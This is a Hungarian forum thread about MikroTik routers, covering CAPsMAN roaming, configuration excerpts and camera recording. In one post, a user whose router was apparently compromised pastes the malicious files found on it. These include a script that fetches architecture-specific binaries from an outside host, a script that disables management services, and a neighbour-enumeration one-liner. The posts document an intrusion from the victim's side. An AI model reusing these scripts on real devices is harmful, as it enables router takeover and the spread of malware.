Szia, pont erre van a winbox, de figyelni kell a biztonsagi beallitasokra.
Cirbolya_sentinel
-
macimeister
aktív tag
Sziasztok.
Ügyfeleimhez mostanában ha szükséges akkor mikrotik routert rakok.
Milyen módszerrel tudnám esetleg megoldani, hogy ezek az eszközöket tudjam távolról kezelni ha esetleg valamit változtatni kell? Illetve jó lenne ha listában látnám az ügyfeleket és a Router online offline állapotát? -
bacus
őstag
Ha valami működik, azt ne akarjuk megjavítani
Capsman -nál igazából csak egy routeren állítgatsz, ha capsman forwarding van, akkor ott látsz mindent.
Én eddig ilyen bonyolult valamit nem csináltam, mint amit írsz. Két ssid, 2,4 és 5 gigán (nyilván ahol az ap tudja).Ha valahol szakadozik, oda kell még egy ap és jó lesz.
5 gigán sokkal stabilabb, gyorsabb, nyilván nincs annyi zavarás, egymást se zavarják. Külön frekin megy.Kössünk egyezséget, megegyezős egyezséget... https://www.paypal.me/engiman/30
-
válasz #42556672 #5939 üzenetére
Ezt nyilván megértem.
Az előbbi 10-20 percben fel-alá szaladgáltam a házban legalább tízszer két telefonnal a kezeimben: megpróbáltam videóra venni egy "connection aborted" üzit (és ahogy eltűnik néhány másodpercre, majd újra megjelenik a WiFi logó az Android teló felső sávjában), de azon kívül hogy hülyén néztem ki, nem jártam sikerrel, sohasem szakadt meg a TCP kapcsolat (csak lelassult ~0 körüli sebességre pár másodpercre, de nem zárult le).
Lehet, hogy mikor legutóbb játszottam hasonlót (csak akkor nem próbáltam videózni), épp előttem sorban az ezerből-egynéhány eseteket, vagy pont valami ritka rossz együttállás volt a szoftver verziókkal, vagy az "éterrel".
TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."
-
#42556672
törölt tag
válasz janos666 #5938 üzenetére
Az a helyzet, hogy sem kedvem sem időm ezért a tesztért szétszedni a konfigom így erre a kérdésedre nem tudok válaszolni. Azért vettem ezeket a cuccokat, hogy így működjön. Előtte volt pár különféle routerem, AP-m de ezt a kényelmet sosem tudtam kihozni belőlük, a végtelenségig rajta ragadt a kliens a gyenge térerejű cuccon, akkor is ha már ott ordított mellette a másik. Ha ugyanazt az élményt adná nem öltek volna bele energiát az összes valamire való cuccot gyártó cégek a megalkotásába.
-szerintem!-
-
válasz #42556672 #5937 üzenetére
Kösz a részletes választ.
De egy kulcspont még mindig hiányzik: mit tapasztalsz, ha nem CAPsMAN alatt futnak az AP-k és sétálgatsz? Van különbség? Olyankor rendszeresen megszakad a videóhívás AP váltáskor?Arra célzok, hogy biztos a CAPsMAN érdeme-e vagy szimplán "okosan" vándorolnak maguktól is a gépeid. Nekem is van olyan, ami igen, de van ami nem. Van ami MAN-al is ügyetlen és van ami anélkül is ügyes...
Ezért nem vagyok meggyőzve, hogy úgy igazából bármit is segít a MAN.[ Szerkesztve ]
TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."
-
#42556672
törölt tag
válasz janos666 #5936 üzenetére
A földszinten 2db. AP-van (1db. HAP AC2, 1db. CAP AC)
Az emeleten 1db. AP-van ( 1db. CAP AC)
A szolgáltató felé egy RB30112db. SSID-t szórnak egyet a vendégeknek és egyet nekem minden alább megadott csatornán, mindkét frekvencián.
2,4GHz-n a használt csatornák: 1, 6, 11
5GHz-n használt csatornák: 36, 44, 52Nem akartam VLAN-t így 2 bridge-et csináltam 2 DHCP pool külön tartománnyal amiket nem route-olom egymáshoz.
Nem tapasztalok megszakadást, folyamatosan sétálgatva Skype meeting-eken amit gyakran itthonról nyomok egy OnePlus 5 telefonnal semmilyen megszakadást nem tapasztalok. Egy Lenovo X1 Yoga a másik alany, azzal nem mászkálok annyit, de ha felmegyek az emeletre mert meló közben zavar a család azzal sincs megszakadás.
[ Szerkesztve ]
-
válasz #42556672 #5935 üzenetére
Az egyértelműség kedvéért leírnád kérlek (és aki még hozzászólt), hogy pontosan mit tapasztalsz: CAPsMAN és önállóan konfigurált AP-k közti szituációkban roaming ügyben?
Többszöri tesztelés után is egyértelműen azt látod, hogy CAPsMAN-el szignifikánsan gyorsabb az újracsatlakozás, vagy akár szó szerint teljesen észrevétlen (meg sem szakadnak az aktív kapcsolatok)?
Azonos vagy eltérő csatornákon vannak az AP-k?
Minden AP és a kliens is dual-band (engedélyezve van a 2G és 5G rádió mindenen, AP-ken és klienseken is)?
Ha igen, akkor ugyan az az SSID? Csak 2G-n és 5G-n belül külön-külön, vagy az összes rádión?Többféle kliens eszközzel is teszteltél (pl. random okostelefon), vagy csak valami kézileg finomhangolt beállításokkal üzemelő PC-vel mászkáltál szép óvatosan?
Lehet, hogy valahol valami apróság hiányzik nálam, de...
/caps-man channel
add band=2ghz-onlyn extension-channel=eC frequency=2472 name=13-9
add band=2ghz-onlyn extension-channel=Ce frequency=2452 name=9-13
add band=5ghz-n/ac extension-channel=Ceee frequency=5180 name="36-42 (5170-5250)"
add band=5ghz-n/ac extension-channel=Ceee frequency=5500 name="100-106 (5490-5570)"
/caps-man datapath
add bridge=bridge1 client-to-client-forwarding=yes name=datapath1
/caps-man security
add authentication-types=wpa2-psk encryption=aes-ccm name=security1 passphrase=XXXXXXXXXXXXX
/caps-man configuration
add channel=13-9 country="hungary" datapath=datapath1 distance=indoors hw-retries=15 name=2g security=security1 ssid=YYY
add channel="100-106 (5490-5570)" country=hungary datapath=datapath1 distance=indoors hw-retries=15 name=5g security=security1 ssid=YYY
/caps-man interface
add channel=9-13 configuration=2g disabled=no l2mtu=1600 mac-address=XXXXXXXXXXX master-interface=none name=2g-F17a_AP_0b-1 radio-mac=XXXXXXXXXXX radio-name=XXXXXXXXXXX
add channel=13-9 configuration=2g disabled=no l2mtu=1600 mac-address=XXXXXXXXXXX master-interface=none name=2g-F17a_AP_1c-1 radio-mac=XXXXXXXXXXX radio-name=XXXXXXXXXXX
add channel="36-42 (5170-5250)" configuration=5g disabled=no l2mtu=1600 mac-address=XXXXXXXXXXX master-interface=none name=5g-F17a_AP_0b-1 radio-mac=XXXXXXXXXXX radio-name=XXXXXXXXXXX
add channel="100-106 (5490-5570)" configuration=5g disabled=no l2mtu=1600 mac-address=XXXXXXXXXXX master-interface=none name=5g-F17a_AP_1c-1 radio-mac=XXXXXXXXXXX radio-name=XXXXXXXXXXXAz SSID mindig ugyan az. Próbáltam tartományonként azonos csatornákkal (mint látszik is, alapértelmezésben először minden AP ugyan azt a csatit kapta, később szedtem szét kézzel, mikor láttam hogy annak nem volt haszna).
[ Szerkesztve ]
TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."
-
ekkold
Topikgazda
Megvalósítható-e caps-al a következő (jelenleg egyénileg vannak konfigurálva):
- Fő router (hAPac2):
2,4GHz-en két hálózat (fő és vendég), 3 különböző ssid (1 főhálózaton és 2 vendéghálón)5GHz egyelőre csak a fő hálózat 1db ssid
- AP1 (RB951G)
2,4GHz-en két hálózat, 4 különböző ssid (2 főhálózaton és 2 vendéghálón)- AP2 (haPAac)
2,4GHz-en két hálózat, 5 különböző ssid. 2 a főhálózaton, 2 a vendéghálón + 1ssid egy IPcam számára. Ez utóbbi elkülönített IP tartományban (nem kap netet), AP2 oszt neki IP-t, és ennek az RTSP elérését (egyetlen port) dst-natolja az AP2, a saját IP címére. Így én elérem a kamerát viszont a kamera nem ér el semmi egyebet.
A kamera külön hálózata ill. IP tartománya nem látszik a hálózat többi részéből.5GHz egyelőre csak a fő hálózaton 1db ssid (később 2 ssid kell majd a fő hálózatra)
Mindegyik AP-n van még néhány további ssid, ami alaphelyzetben nem használt (le van tiltva), de néha be kell kapcsolni, egyszerre többnyire csak egy AP-n.
A fő háló közvetlenül, a vendégháló ezen belül egy VLAN-ban jut el az AP-khoz, UTP kábelen.
Jelenleg minden működik, ahogy kell. Tehát érdemes-e caps-al küzdeni? Könnyebb ill. átláthatóbb lenne-e tőle a kezelése?
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/
-
Mi? Roaming 1 CAP-el? Roaming? Raom A-ról A-ra és vissza A-ra?
(#5929) bacus - Lehet, hogy csak ezekkel a még mindig viszonylag új IPQ-4018 chipsetekkel van szoftveres (ROS) gond, vagy az épp tesztelt kliensek a reménytelen ügyek és kivételek (többnyire Qualcomm chipset-es kütyüket néztem, bár mind AC wave-1 vagy N, nem wave-2, de próbáltam Intel AC kártyás notival is sétálgatni).
Maga a CAPsMAN működik és nyilván roaming-ol is a kliens, csak épp nem látom, hogy bármivel simább vagy gyorsabb lenne a roaming, ha CAPsMAN alatt vannak az AP-k, mint ha teljesen önállóan vannak a levegőben.
Így is, úgy is vált előbb-utóbb a kliens, de sohasem teljesen észrevétlen (vagy csak véletlenszerűen néha elég gyors, hogy annak nevezzem, de nem kiszámíthatóan) és nem láttam, hogy függne a jellemző/átlagos roaming újracsatlakozási idő a CAPsMAN-től (szerintem ránézésre mindig a klienstől függ, akár CAPsMAN, akár nem).[ Szerkesztve ]
TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."
-
bacus
őstag
-
válasz pappkarcsi #5921 üzenetére
A seamless-roaming cikket szerintem felejtsd el. Legutóbb pont emiatt vettem itthonra Mikrotik hAP AC2-ket (más célra ismertem és szerettem már a márkát), de nálam nem látszik segíteni semmit a roaming-on a CAPsMAN, és így azóta is furdal, hogy az Ubiquiti cuccai jobbak lettek-e volna erre a vágyra (roaming).
Szerintem csak egy port forward kell az NVR-ra, és azon keresztül éred el a kamerák real-time stream-jét is WAN-on, miután beléptél az NVR-ra a saját manager szoftverükkel (ha van ilyen funkciója az NVR-nak, nem ismerem a Hikvision-t), vagy amit már rögzített az NVR (ezt a "múltat" szinte minden NVR-on eléred).
Én személy szerint kihagynám az NVR-t, ha van a hálózaton valami amúgy is 24/7 online PC, vagy összeraknék erre valami kis gépet (Intel J szériás integrált deszkákból, vagy akár egy Raspberry, stb) ffmpeg-el rögzíteni az RTSP stream-et, és akkor lehet minden kamera a LAN-on vagy akár a WAN-ra is forward-olt.
Pl. egy egyszerű linux bash script kivált egy NVR-t.:
while :; do sleep 1 && ffmpeg -rtsp_transport udp -i rtsp://192.168.1.201/user=admin_password=yyy_channel=1_stream=0 -vcodec copy -an -t 3600 /mnt/data/surveillance/XXX/1/`date +%Y.%m.%d_%H.%M`.ts 2>/dev/null; done
Plusz egy cronjob ami törli a régi file-okat ebből a mappából. (Az URL persze márka/típus függő.)[ Szerkesztve ]
TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."
-
bambano
titán
válasz pappkarcsi #5921 üzenetére
pontosan miért is szeretnéd, hogy a kémkedő hikvision kamerák kijussanak a netre?
Egy átlagos héten négy hétfő és egy péntek van (C) Diabolis
-
akos86
aktív tag
Sziasztok!
Beszereztem egy Mikrotik hAP ac2 routert be is konfiguráltam a routert, kábelen és wifin is van internet hihetetlen mennyi beállítási lehetőség van benne. Most ismerkedem a felülettel illetve a Router Os rendszerrel teljesen magával ragadott. A jelenlegi problémám az hogy az itthoni 120mbit-es internet ami kábelen meg is van, de wifin valamiért csak olyan 60-65mbittel jön szerintem ebben jóval több is lenne, mit ronthattam el? Valószínű hogy én nem jól állíthattam be valamit. Bármilyen tanácsot/segítséget szívesen fogadok.
3dfx, gone but never forgotten...
-
dmc
aktív tag
válasz pappkarcsi #5921 üzenetére
-
pappkarcsi
senior tag
Sziasztok!
Szeretnék segítséget kérni hardver választás tekintetében. Egy kisebb irodai hálózatot szeretnék kiépíteni, ahol lenne egy Hikvision NVR, és kb 10 laptop/telefon. Az NVR vezetéken, a többi eszköz pedig wifin kellene, hogy csatlakozzon. A magas rendelkezésre állás érdekében az eddig épített rendszerekhez képest, ahol tp-link és asus eszközökkel építettem ki ezt, most szeretnék Mikrotik-et használni.
2 szint lesz, 150 nm szintenként. Az irodában lenne a bejövő net, az router és az nvr. A falak gipszkartonok, így terv szerint elég lesz szintenként 1-1 AP. A bejövő net kb 50-100 Mbit lenne, ennek kellene a max 10-12 eszközt kiszolgálni.. (netezés, messenger, youtube, instagram).Az eddig kinézett eszközök: hex poe + Cap AC
Ezekhez mit szóltok?Az NVR-hez tartozik 8 kamera, de azokat a felvevőbe kötöm közvetlen, így ez a hálózatnak nem lesz "része".
Ahhoz, hogy a kamera kilásson a netre és azt kintről el lehessen érni, a gyártó ad egy ingyenes ddns funkciót, ezt az nvr-ben lehet regisztrálni. ros oldalról külön engedni kell valamit?Tekintettel arra, hogy a ros számomra teljesen új, de alapvetően informatikai vénával rendelkezem, nem hiszem, hogy a neten található tutorialok alapján ne tudnám összerakni. Kiindulásnak ezt a guide-ot használnám, mert én is szeretnék egy ssid-t használni.
http://loloke.hu/seamless-roaming-megvalositasa-mikrotik-kornyezetben/Segítő válaszaitokat, guide-okat és videolinkeket a témában előre is köszönöm!
Regisztrált: 2007 - 104 pozitív értékelése van és nincs negatív értékelése
-
Sly\'s
csendes tag
The UPS monitor feature works with APC UPS units that support “smart” signalling over serial RS232 or USB connection.
Google fordítva: Az UPS monitor funkció az APC UPS egységgel működik, amely "intelligens" jelátvitelt biztosít soros RS232 vagy USB csatlakozáson keresztül.
Üdv. Slys!
-
dmc
aktív tag
Sziasztok!
Szeretnék egy kis segítséget kérni .
Adva van egy RB2011UIAS-RM ruter ugye ezen van egy USB port arra rá dugtam egy UPS USB vezetékét de sehogy se tudom életre kelteni.
Ahogy a képen látszik nekem ez jelenik meg.
Nem lehet rátenni az UPS t ?
A segítséget előre is köszönöm![ Szerkesztve ]
-
bacus
őstag
válasz Zwodkassy #5916 üzenetére
Én majd szerdán távvezérléssel reseteltetem a routert, megnézem mi volt majd, ha elmenti a konfigot a router.
Kíváncsi vagyok, hogy tudom e majd frissíteni.
Nekem az fura, hogy egy reset után megmaradnak scriptek a routerben. Egy ilyen hard reset után olyan állapotba kellene kerüljön a router, mintha friss netinstallal feltett verzió lenne, minden üres, nincs régi konfig sem.
Én azt gondolom, hogy a felprogramozása egy ilyen routernek az az igazi érték, ezt védeném. Ha a tulaj reseteli, programozza újra elölről, mert ez így nem tisztességes teljesen, hogy reset, jelszó vált és ..
Kössünk egyezséget, megegyezős egyezséget... https://www.paypal.me/engiman/30
-
senior tag
Találtam egy "cgret" nevű fájlt a következő tartalommal :
"#!/flash/xbin/bash
if [ "$2" == "" ]; then
echo "dst?"
exit
fi
/nova/bin/info '/tool fetch host="cloudrouter.online" url=("http://104.24.112.169/images/".[/system resource get architecture-name]."/'$1'") dst-path=tmpdf1'
mv /flash/rw/pckg/tmpdf1 $2"Volt egy "exsvc.rsc" nevű fájl :
"# oct/03/2018 04:24:32 by RouterOS 6.37.4
# software id = xxxx-yyyy
#
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh disabled=yes"Egy "r1.rsc" fájl :
"/foreach m in=[/ip neighbor find where platform~"MikroTik"] do={/put ([/ip neighbor get $m version]." ".[/ip neighbor get $m software-id]." ip=".[/ip neighbor get $m address4] )}"
Találtam egy "bbox.jpg" fájlt, ami nem kép az tuti. Nem elemezgettem még.
És még egy "mikrotik.php" neű fájlt, de ennek 0 byte a mérete (?).[ Szerkesztve ]
-
quby
őstag
Sziasztok. Capsman gurukat kérdezném:
A követketöt szeretném megoldani: Több AP, van ami csak n-es meg van 3 AC-s is. Két SSID kellene ugy hogy mindkét SSID menjen 2.4-en és 5 Ghz-en is. Nyilván ahol n-es ap van ott csak n-es. A multi ssid megy. Provisioningnél master-slave felállásban. De a két bandet fogalmam sincs hogy hogy kell hozzáadjam. Ha két különbözö provisiont csinálok akkor csak az egyik él, többnyire az elsö. Mi itt a megoldás? Leginkább a miérteket szeretném tudni nem a hogyanokat!
A legügyesebb állat az ürge, hiszen búzával teli pofazacskóval is képes repülni, miközben egy bagolyt egyensúlyoz a hátán.
-
senior tag
Én két hete találkoztam egy ilyen Mikivel. A kollégák szóltak, hogy nem érik el a mögöttes szolgáltatást (nem ment a Port-Forward). 6.37.5 volt rajta, a kutya nem foglalkozott vele. Átirogattak néhány tűzfal szabályt, meg scripteket. Majd ha gép előtt ülök, bemásolok néhány szemelvelényt (már amit lementettem).
Ami érdekes, nem tudom frissíteni rajta a ROS-t. Megfogott. -
bacus
őstag
Nekem lehet most megvan az első , nem én felügyeltem, lehet csak átírták a jelszót. A tulaj kért volna változtatást, én meg nem tudok belépni, kérdeztem kollégám, azt mondta ő nem frissített, nem lépett be, de most amit látok, hogy 6.43.2 verzió van rajta, sztem nem ez volt, ez túl friss.
Egyébként ez nem a fő router, hanem a tulaj dmz-be rakta, elvileg így tudott távolról belépni, mert a fő routere az szolgáltatói..
Kössünk egyezséget, megegyezős egyezséget... https://www.paypal.me/engiman/30
-
válasz bambano #5908 üzenetére
Nem is akartam, míg nem jött a válasz, hogy ez a baj.
Ha akarja törölheti topikgazda/moderátor.Viszont a WDS már nem működik Atheros-os Mikrotik és Atheros-os OpenWRT közt (ezt ROS L4-es AP-vel is kipróbáltam). Szóval majd kereshetek oda valami használt L4-es Mikrotik AP-t. (Elkezdtem beállítani az OWRT-n WALN->WLAN NAT-ot, de 10-20 perc után felhúztam magam rajta, hogy valamiért nem sikerült.)
[ Szerkesztve ]
TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."
-
bacus
őstag
akinek már törték fel a routerét az mit tapasztalt? meghagyták rajta a konfigot? megváltoztatták a jelszavát?
mik a tünetek?Kössünk egyezséget, megegyezős egyezséget... https://www.paypal.me/engiman/30
-
bacus
őstag
A legfrissebb ros-t tegnap többször is sikerült kiborítanom. Upgradeltem egy routert. Az upgradelt routernél több bridget definiáltam, régi verzióról ment a legfrissebbre, minden probléma nélkül. A bridgeknél azt a bridget kinyitva ahol a hw offload is van, beikszelve a fast forward opciót, a router újraindításig megdöglik.
Wikin írják, hogy nem lehet bekapcsolva, de hagyja
Kössünk egyezséget, megegyezős egyezséget... https://www.paypal.me/engiman/30
-
bambano
titán
válasz janos666 #5907 üzenetére
"Működik a pont-pont kapcsolat Bridge módba rakott Level3 Mikrotik (most abban van ez az SXT) és 1 darab tetszőleges (nem csak Mikrotik) kliens közt is.": ezt csak halkan mondd, mert az általános esetet a szabvány tiltja. egyes speciális esetekben előfordulhat, hogy működik a wifi bridge, de az kivétel.
Egy átlagos héten négy hétfő és egy péntek van (C) Diabolis
-
Működik a pont-pont kapcsolat Bridge módba rakott Level3 Mikrotik (most abban van ez az SXT) és 1 darab tetszőleges (nem csak Mikrotik) kliens közt is.
Ezt most frissen is kipróbáltam újra az aktuális ROS verzióval (mikor teszteltem, hogy jól konfigoltam és nem szemetet adtak-e el): itthon az asztalon letettem mellé egy telefont, és pörgettem rajta a szintetikus adatforgalmat iperf3-al. Gond nélkül ketyegett, nem szakadozott és jól volt a sebesség is.Nyilván ezer dologtól függ minden ilyen, de annyit csináltam, hogy felemeltem az ablaküvegnek támasztott N66U-t, aminek az egekbe néztek az omni antennái, és odatettem a helyére az SXT-t, beforgatva, hogy lehetőség szerint legjobban a kliensgépre nézzen (pontosabban annak az épületnek az ablakára, ahol az van).
Egyetlen mobiltelefont kéne csak a hálózaton tartania. Az N66-nak nagyjából sikerült (saccra úgy óránként szakadt csak le), csak kicsit kellett volna jobb, de helyette egyértelműen rosszabb lett (már tiltólistázta is az Android az AP-t, előtte pedig percenként leszakadt).
Én most ezen lepődtem meg picit, hogy relatívan rosszabb ide ez az STX.Még azt tudod megtenni low-buget kreatív-barkácsolgatással, hogy viszek a "sufni" ablakba egy leselejtezett Atheros rádiós TP-Link router-t, és megpróbálok WDS-t összedobni OpenWRT és Mikrotik ROS közt (vagy ha az nagyon nem, akkor NAT-olni vele, de azt nem szeretem). Szokott a WDS sikerülni? (Úgy tudom a fontosabb, hogy a chipset kompatibilis legyen.)
(#5906) gabyka - De akkor sokkal több eszköz kell: egy AP a főépületbe (pl. egy második SXT, vagy marad a helyén az N66U), a sufnis kliens SXT, és még egy AP a sufniba, amire végül a telefon csatlakozhat.
Ezt akartam megúszni, különben 2db Lite5-öt vettem volna 1db Lite2 helyett (+ az N66U vagy valami régi TP-Link szemét ment volna át a sufniba AP-nek).[ Szerkesztve ]
TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."
-
ekkold
Topikgazda
válasz janos666 #5903 üzenetére
Az SXT lite2-t level3 licencel forgalmazzák, ami nem enged AP módot, csak bridge-t. Azaz csak pont-pont kapcsolatra, vagy kliensnek jó.
A csatlakozás pedig (a típustól függetlenül) a klienseken is műlik, meg a másik oldal vételi-érzékenységén is.
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/
-
Viszonylag normális az, ha egy emeletes ház ablakán kinéző ASUS N66U-t (az eredeti dual-band omni-directional antennáival) kicseréltem egy SXT Lite2 r3-ra (használtan vettem, ROS 6.43.4-re frissítettem és reset-eltem), ami egyenesen a "célra" néz (nevezzük úgy "sufni" ablakára), akkor roszabb lett a helyzet (eddig szimplán lassú és néha szakadt, most alig csatlakozik fel a kliens és mikor mégis, akkor lassabb)?
Az N66U hírhedten hangos (régi firmware-el nem felel meg az FCC-nek), de az SXT-nek papíron 10 dBi az antenna nyeresége. (A teszthez manual-txpower módba tettem, vagyis elvileg 27db max, amit ír.)Nem azt tartom lehetetlennek, hogy nem működik jól az SXT sem ebben a szituációban, csak hogy relatívan rosszabb ez, mint az omnnis cucc.
Azért ez volt a lépés, mert az SXT-t fel lehet tenni magasabbra kültéren (míg a beltéri ASUS-t nem), így már remélem elég lesz. De így elbizonytalanodtam, hogy elég lesz-e kicsit jobb elhelyezéssel az SXT, ha most így muzsikál.
[ Szerkesztve ]
TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."
Új hozzászólás Aktív témák
Állásajánlatok
Cég: Marketing Budget
Város: Budapest